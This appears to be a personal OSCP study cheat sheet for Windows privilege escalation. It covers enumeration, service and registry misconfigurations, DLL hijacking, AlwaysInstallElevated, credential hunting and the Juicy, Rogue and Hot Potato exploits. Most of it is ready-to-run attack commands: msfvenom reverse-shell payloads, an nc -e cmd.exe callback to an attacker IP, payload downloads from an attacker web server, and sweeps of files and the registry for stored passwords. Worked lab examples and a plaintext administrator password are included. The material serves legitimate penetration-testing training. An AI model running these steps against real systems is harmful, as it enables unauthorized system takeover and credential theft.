In the OSCP exam, Only Gaining access is not enough. Most of the machines may require to escalate to higher privilege. To learn more about windows privilege escalation I have taken a course from Udemy, watching IPSec youtube video, and reading tutorials from various sources. Whatever i have learned, took note.

I have organized my notes as a cheat sheet and now it is public.

Note: A cheat sheet is not understandable without basic knowledge! After all cheat sheet is not a tutorial!

Checklist

I would like to follow two standard and cheatsheet online:

  1. Hacktricks escalation checklist
  2. PayloadAllTheThings Escalation CheatSheet

Helpful Tools

  1. WinPeas: This tool check common misconfiguration that may lead to escalating privilege.
  2. PowerUP: It is a Powershell script to check common vulnerability.
  3. Windows-Exploit-Suggester: It is a Windows Kernel Exploit suggester.
  4. icacls(Windows): Display Access Control List on Specified files.

Example:

All tools first need to be transferred to the target machine!

Winpeas:

.\winpeas.exe
.\winpeas.exe serviceinfo

PowerUp:

powershell.exe -exec bypass
. .\PowerUp.ps
Invoke-AllChecks

Wiindows Exploit Suggester:

From the target first collect the output of systeminfo command and save in Kali.

python windows-exploit-suggester.py -u
python windows-exploit-suggester.py -i systeminfo.txt -u *.xls

icacls:

icacls "path_to_check"

Enumeration

We need to enumerate for basic information before attempting to escalate privilege.

#Get Windows Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
#Get patch Information
wmic qfe get Caption, Description, HotFixID, InstalledOn

#Get current username
whoami 

#Get groups and permission information
whoami username /all 

#get user list
net user 

#get information for specific user
net user admin

#Get OS information like version, hotfix etc.
systeminfo 

#List all running process. Keep Note the suspicious one!
netstat -ano 

#List all profile's firewall rules!
netsh advfirewall firewall show rule name=all 

#List all installed software.
wmic product get name 

#List all installed software and version.
wmic product get name, version 

#Get scheuduled task list
schtasks /query /ms LIST /v

#Running Process
tasklist /SVC

#Vulnerable Drivers
driverquery.exe /fo table

Kernel Exploits

Kernel Exploit could be dangerous. So any kernel exploit should be run if there is no other way to escalate the privilege.

Get System Information and transfer to remote Linux host. This is the command we need to run before we find exploits on Google or Searchsploit:

$ systeminfo

Use Windows Exploit Suggester to get exploit suggestions:

python windows-exploit-suggester.py -u
python windows-exploit-suggester.py -i systeminfo.txt -u *.xls

We can use the information generated by Windows-exploit-suggester to find compiled exploit in the following link:

https://github.com/SecWiki/windows-kernel-exploits

Find Exploit in Google and Searchsploit. Example:

Google> Windows Version Privilege Escalation Exploit
Searchsploit> $ searchsploit windows 10

Service Exploits

If a service improperly configured, it may lead to escalate to higher privilege. 5 way service can be exploited.

  1. Insecure Service Permission
  2. Unquoted Service Path
  3. Insecure Registry Permission
  4. Insecure Service Executable
  5. DLL Hijacking

Service Enumeration

We should find out all running services and the version.

#cmd
tasklist /SVC

#powershell
Get-Service

#wmic
wmic service list brief

Listing All Running Services

sc queryex type=service 
powershell.exe -c "Get-Service | Where-Object {$_.Status -eq "Running"}"

Search for more info against a suspicious service with this cmd/powershell command

sc queryex type=service state=all | find /i "SERVICE_NAME: service_name"
#or
powershell.exe -c "Get-Service | Where-Object {$_.Name -like "*service_name*"}

Find the status of the target services! We can check with these command.

sc query service_name 
Get-Service service_name

Modifying a service binary path

sc config service_name binpath='c:\windows\temp\shell.exe'

Start and Stop a Service

net start serv_name
net stop serv_name

Exploit Insecure Services Permission

We need to find a suspicious service name. If a service running with permission SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS, We can exploit it by changing its binary path.

sc qc service_name
sc config service_name binpath="c:\windows\temp\backdoor.exe"
net stop service_name
net start service_name

Exploiting Unquoted Service Path

If a service not enclosed within the quote, it may help us to escalate the privilege. Anyone folder of the service path needs to be writable. For example, I found C:\Program Files\Deploy Ready\Service Files\Deploy.exe. In C:\Program Files\ Directory, The “Deploy Ready” and “Service Files” subdirectory is writable. We can exploit this vulnerability to escalate the privilege. How does it work?

  1. When starting the service, if it failed to execute Deploy.exe
  2. It will execute C:\Program Files\Deploy Ready\Service.exe
  3. If Service.exe was not found, C:\Program Files\Deploy.exe will be executed!

Find Vulnerability

#Manually
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

#With winpeas
.\winPEAS.exe quiet servicesinfo

Test If any directory is writable:

  1. Manually
echo "Test";"C:\Path a\Path b\Path c\test.txt" #no permission denied? We are fine then
icacls "C:\Path a\Path b\Path c\test.txt" #F=Full, W=Write
  1. With Accesschk(More efficient)
.\accesschk.exe /accepteula -uwdq C:\
.\accesschk.exe /accepteula -uwdq "C:\Program Files\"
.\accesschk.exe /accepteula -uwdq "C:\Program Files\Service Path"

Exploit

If we don’t have permission to restart the service we can try to reboot the machine. And if the service configured AUTO_START and run as LocalSystem, we will get a system shell

sc qc "service_name"
copy \\smb_ip\\Service.exe "C:\Program Files\Deploy Ready\Service.exe"
net start service_name
#If unable to start the service try rebooting
shutdown /r /t 0

Insecure Registry Permission

If we can’t write to a service directory/folder, but can modify or write to registry, we can escalate the privilege.

Find Services

#Get All Services info
.\winPEAS.exe quiet servicesinfo

#Get All Services info
.\winPEAS.exe quiet servicesinfo
reg query hklm\System\CurrentControlSet\Services /s /v imagepath

Confirm Registry weak permission

#Confirm Weak Permission with Powershell command
Get-Acl HKLM:\System\CurrentControlSet\Services\SrvName |Format-List

#Confirm with accesschk
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\SrvName

Exploit

If we are confirm that we can modify the registry:

#Add Backdoor to the Registry
reg add HKLM\SYSTEM\CurrentControlSet\srevices\SrvName /v ImagePath /t REG_EXPAND_SZ /d C:\windows\temp\backdoor.exe /f
#Start the service
net start SrvName

DLL Hijacking

If a program or service can’t load a dll file in specified directory, we can supply our own malicious dll for escalation. The DLL loading folder need to be writable!

Check Permission of the Program folder

icacls C:\program\

Create Malicious Dll File and move the payload to program specified directory.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attack_IP LPORT=attacker_port -f dll -o exsisting.dll

Now Try restart the service or execute the vulnerable program

Exploit Startup Program

We need to copy the accesschk64.exe to remote host to check permission. If a program has FILE_ALL_ACCESS permission, we can exploit it for system shell.

accesschk64.exe -wvu “C:\Program Files\Autorun Program”
copy \\smb_ip\backdoor.exe “C:\Program Files\Autorun Program\program.exe”

We can also get admin session by exploiting startup applications. Check the permission. If the folder has write permission, we just need to copy our shell.exe to that folder and wait for admin to login.

icacls.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”
copy \\smb_ip\bak.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\bak.exe”

Exploiting AlwaysInstallElevated

We need to check if it is enabled. If the value is 0x1, we can exploit it!

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Generate backdoor with metasploit, and Transfer to victim machine

msfvenom -p windows\x64\meterpreter\reverse_tcp LHOST=tester_ip LPORT=tester_port -f msi -o smb-folder\shell.msi

Copy shell.msi to victim machine using SMB or other way and run:

msiexec /quiet /qn /i shell.msi

Exploiting Clear Text password

If we are in luck we may found password in clear text.

Note: This section heavily copied from https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials

Finding WIFI password

netsh wlan show profile
netsh wlan show profile <SSID> key=clear

Search Sensitive Files that may have credential

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2&gt;nul | findstr /v ".dll"

Search for “Password"

#Search suspicious files from filename
dir /s /W *pass* == *cred* == *vnc* == *.config* | findstr /i/v "\\windows"

#Search suspicious files from content
findstr /D:C:\ /si password *.xml *.ini *.txt #A lot of output can be generated
findstr /D:C:\ /M /SI password *.xml *.ini *.txt 2&gt;nul | findstr /V /I "\\AppData\\Local \\WinXsX ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.CloudExperienceHost" 2>null

Search Password in Registry

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2&gt;nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" #Autologin
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s #Check the values saved in each session, user/password could be there
reg query "HKCU\Software\OpenSSH\Agent\Key"

# Search for passwords inside all the registry
reg query HKLM /f password /t REG_SZ /s #Look for registries that contains "password"
reg query HKCU /f password /t REG_SZ /s #Look for registries that contains "password"

Try With Winpeas:

.\winPEAS.exe quiet filesinfo userinfo

RunAS

Using cmdkey

cmdkey /list
runas /savecred /user:Administrator "c:\windows\temp\backdoor.exe"

By providing credentials

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

Exploiting Well known Software

Some software installed in the target machine may have public exploit to use. We should google search for a exploit with the version of installed software.

tasklist /v 
.\winpeas.exe quiet processinfo

Schedule Task

#from CMD
schtasks /query /fo LIST /v
#In Powershell
PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

For example above command found C:\Tools\Adm.Ps1 is running every 10 minutes as system and we have rights to modify it:

accesschk.exe /accepteula -quvw user C:\Tools\Adm.Ps1

We simply can append our command to execute as system. Let’s append command to run rev.exe(Reverse shell to port 443):

echo C:\windows\temp\rev.exe>> C:\Tools\Adm.Ps1

If everything goes well, we should have shell as system in 10 minutes!

Dangerous User Privileges

Some privileges for a user is dangerous. They could lead to escalate to higher privilege I will list some of them:

SEImpersonatePrivilege

It can act as any other user, such as, Administrator. The vulnerability could be exploited with JuicyPotato

SeAssignPrimaryPrivilege

Assign an access token to new process. Can be exploited with JuicyPotato

SeBackUpPrivilege

If a user has this privilege he is able to read files. That’s mean the user can extract password/hash from registry which could be used for pass-the-hash attack

SeRestorePrivilege

This privilege grant a user to modify service binary, dll, also modify registry settings

Others risky Privilege

  1. SeCreateTokenPrivilege
  2. SeLoadDriverPrivilege
  3. SeDebugPrivilege

Hot Potato Exploit

A Tutorial: https://pentestlab.blog/2017/04/13/hot-potato/

Windows 7

.\Potato.exe -ip &lt;local ip> -cmd &lt;command to run> -enable_defender true -enable_spoof true -disable_exhaust true

Windows 10

.\Potato.exe -ip &lt;local ip> -cmd &lt;cmd to run> -disable_exhaust true -disable_defender true

Juicy Potato

If SeImpersonate/SeAssignPrimaryToken JuicyPotato can be used to escalated privilege.

Note: CLSID can be found in: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

JuicyPotato.exe -l 4444 -p C:\Windows\Temp\Rev.exe -t * -c {CLS_ID}

Rogue Potato

Just another Windows Local Privilege Escalation from Service Account to System. So the requirement is the accessed account needed to be a service account.

.\RoguePotato.exe -r 192.168.1.11 –l 9999 -e "C:\Windows\Temp\rev.exe

Quick Real Example

The same way we can add a root user to the /etc/passwd!

Unquoted Service

systeminfo
Host Name: DEPLOYABLE
OS Name: Microsoft Windows Server 2012 R2 Datacenter
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
--------------------------------------------------
&gt;whoami /all
whoami /all
USER INFORMATION
User Name SID
================= =============================================
deployable\tomcat S-1-5-21-2340103987-1023754366-731290932-1001
GROUP INFORMATION
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
.......
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
.......
PRIVILEGES INFORMATION
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

> wmic product get name, version
>
> powershell -c Invoke-WebRequest "http://10.10.0.67:8000/WinPeas.exe" -OutFile "wino.exe"

> .\wino.exe serviceinfo
......
Deploy(Deploy)[C:\Program Files\Deploy Ready\Service Files\Deploy.exe] - Manual - Stopped - No quotes and Space detected
......
> cd "C:\Program Files\Deploy Ready\"

Generating the Exploit in Kali, Starting Python Server and Listening for connection:

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.67 LPORT=1337 -f exe &gt; Deploy.exe
$ python3 -m http.server
$ nc -lvp 1338

Downloading and running exploit in windows:

sc qc deploy
>powershell -c Invoke-WebRequest "http://10.10.0.67:8000/Deploy.exe" -OutFile "C:\Program Files\Deploy Ready\Service.exe"
>sc start deploy

Clear Text Password

I was just able to get shell with exploiting blogengin. Uploaded winpeas and it was able to find AutoLogon Credential

Here is the step i did in kali to get Administrator access:

winexe -U Administrator%PzCEKhvj6gQMk7kA //172.3.1.6 cmd.exe

Escalated with JuicyPotato

If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.

Note: Juicy Potato doesn’t work on Windows Server 2019 and Windows 10 1809 +.

Generated another Shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.67 LPORT=1338 -f exe>shell1338.exe

Uploaded JuicyPotato.exe and the shell1338.exe:

powershell -c Invoke-WebRequest "http://10.10.0.67:8000/shell1338.exe" -OutFile "shell1338.exe"
powershell -c Invoke-WebRequest "http://10.10.0.67:8000/JuicyPotato.exe" -OutFile "JuicyPotato.exe"

Execute for system shell(CLS ID can be found in: http://ohpe.it/juicy-potato/CLSID/ and https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md , Note tested):

JuicyPotato.exe -t * -l 1010 -p shell1338.exe
JuicyPotato.exe -t * -l 1010 -p shell1338.exe -c {cls_id}

Modify Binary to Escalate

I was logged in to evil-winrm. Windpeas did not find anything. So i tried manual enumeration. Here is the step of escalation:

Evil-WinRM PS C:> services
Path Privileges Service
---- ---------- -------
"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" False AmazonSSMAgent
"C:\Program Files\Amazon\XenTools\LiteAgent.exe" False AWSLiteAgent
"C:\Program Files\Amazon\cfn-bootstrap\winhup.exe" False cfn-hup
C:\Services\monitor1.exe True monitor1
C:\Services\monitor2.exe True monitor2
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe False PerfHost
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller

Evil-WinRM PS C:> icacls Services\monitor1.exe
Services\monitor1.exe BUILTIN\Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files

Evil-WinRM PS C:\services> upload /home/bytef/cybsec/monitor1.exe
Info: Uploading /home/bytef/cybsec/monitor1.exe to C:\services\monitor1.exe
Data: 98400 bytes of 98400 bytes copied
Info: Upload successful!
Evil-WinRM PS C:\services> cmd /c "sc start monitor1"
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Evil-WinRM PS C:\services>

And quickly i got system shell

PayloadAllTheThings